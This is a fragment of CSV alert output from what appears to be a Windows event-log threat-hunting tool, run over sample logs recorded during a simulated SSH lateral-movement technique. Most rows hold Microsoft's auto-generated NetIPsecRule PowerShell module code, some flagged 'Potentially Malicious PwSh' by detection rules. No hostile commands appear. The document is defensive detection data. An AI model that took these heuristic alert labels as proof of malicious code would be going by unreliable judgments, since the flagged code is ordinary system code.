'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { 
foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query 
(cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = 
${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.082 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.082 
